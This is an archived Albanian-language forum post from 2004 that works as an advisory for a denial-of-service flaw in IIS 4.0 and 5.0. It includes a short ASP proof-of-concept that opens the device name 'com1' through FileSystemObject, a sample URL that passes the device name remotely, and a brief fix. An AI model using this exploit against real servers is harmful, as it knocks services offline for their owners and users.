Dardania.de

Dardania.de (https://www.dardania.de/vb/upload/index.php)
-   Informatika (https://www.dardania.de/vb/upload/forumdisplay.php?f=119)
-   -   Microsoft Internet Information Services (IIS) dhe Denial Of (https://www.dardania.de/vb/upload/showthread.php?t=13432)

BERLINERBOY 16-03-04 01:15
Microsoft Internet Information Services (IIS) dhe Denial Of
 
RENDESIA : E Larte

Sistemet e Infektuara:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0


Pershkrim:
Hapje dhe lexim i fileve te sistemit ( com1,com2,etc.) duke perdorur Scripting.FileSystemObject do coje ne crash procesorin ASP ( asp.dll)

Shembull:

1.Exploit lokal
N.q.s keni lejen per te krijuar file .asp me kete script mund te coni ne krash procesonin e ASP

2.Exploit ne distance
Duke kaluar emrat e file per parametra te scriptit mund te hapni e te laxoni informacione. Duke i kaluar parametrat si file sistemi do crashoje procesorin.

[url]http://host.int/scripts/script.asp?script=com1[/url]

3.Exploiti ne ASP



Dim strFileName, objFSO, objFile

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

strFileName = "com1"

Set objFile = objFSO.OpenTextFile(strFileName)

Response.Write objFile.ReadAll

objFile.Close


4.Zgjidhja


Duhet thjesht te rregulloni Scripting.FileSystemObject qe te kontrolloje emrat e file para se t'i hape.


BERLINERBOY nuk mban asnje lloj pergjegjesie per perdorimin
e informacionave te mesiperme qe u parashtruan per qellim
teresisht informativ. :-)


Te gjitha kohėt janė nė GMT +1. Ora tani ėshtė 11:47.

Powered by vBulletin Version 3.8.7
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.